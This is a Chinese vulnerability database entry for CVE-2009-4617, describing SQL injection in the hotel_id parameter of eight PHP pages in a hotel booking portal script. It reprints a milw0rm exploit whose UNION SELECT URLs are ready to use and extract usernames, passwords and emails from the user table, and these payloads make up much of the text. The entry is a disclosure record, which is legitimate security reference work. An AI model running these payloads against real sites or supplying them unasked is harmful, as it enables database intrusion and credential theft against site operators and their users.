Tourism Script Accommodation Hotel Booking Portal Script多个SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1118432 漏洞类型 SQL注入
发布时间 2009-09-10 更新时间 2010-01-18
CVE编号 CVE-2009-4617 CNNVD-ID CNNVD-201001-180
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/9632
https://www.securityfocus.com/bid/80305
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201001-180
|漏洞详情
TourismScriptAccommodationHotelBookingPortalScript中存在多个SQL注入漏洞,远程攻击者可以借(1)hotel.php,(2)details.php,(3)roomtypes.php,(4)photos.php,(5)map.php,(6)weather.php,(7)reviews.php,以及(8)book.php中的hotel_id参数执行任意SQL指令。
|漏洞EXP
###############################################################
#################### Viva IslaM Viva IslaM ####################
##
## Remote SQL Injection Vulnerability ( hotel.php hotel_id )
##
## Accommodation Hotel Booking Portal
##
## http://www.tourismscripts.com
##
###############################################################
###############################################################
##
## AuTh0r : Mr.SQL
##
## H0ME   : WwW.55a.NeT
##
## Email  : SQL@Hotmail.iT
##
########################
########################
##
## -[[: ExploiteS :]]-
##
## www.TraGeT.CoM/hotel.php?hotel_id=1'+UNION+SELECT+0,0,0,0,0,CONCAT_WS(0x3a3a3a3a3a,user_name,password,email),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+user/*
## www.TraGeT.CoM/details.php?hotel_id=1'+UNION+SELECT+0,0,0,0,0,CONCAT_WS(0x3a3a,user_name,password,email),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+user/*
## www.TraGeT.CoM/roomtypes.php?hotel_id=1'+UNION+SELECT+0,0,CONCAT_WS(0x3a3a3a3a3a,user_name,password,email),0,0,0,0,0,0,0,0+FROM+user/*
## www.TraGeT.CoM/photos.php?hotel_id=1' << SQL >>
## www.TraGeT.CoM/map.php?hotel_id=1' << SQL >>
## www.TraGeT.CoM/weather.php?hotel_id=1' << SQL >>
## www.TraGeT.CoM/reviews.php?hotel_id=1' << SQL >>
## www.TraGeT.CoM/book.php?hotel_id=1' << SQL >>
##
########################
########################

# milw0rm.com [2009-09-10]
|受影响的产品
tourismscripts Tourism Script Accomodation Hotel Booking Portal Script 0
|参考资料

来源:XF
名称:accommodation-hotelid-sql-injection(53138)
链接:http://xforce.iss.net/xforce/xfdb/53138
来源:MILW0RM
名称:9632
链接:http://www.milw0rm.com/exploits/9632
来源:SECUNIA
名称:36661
链接:http://secunia.com/advisories/36661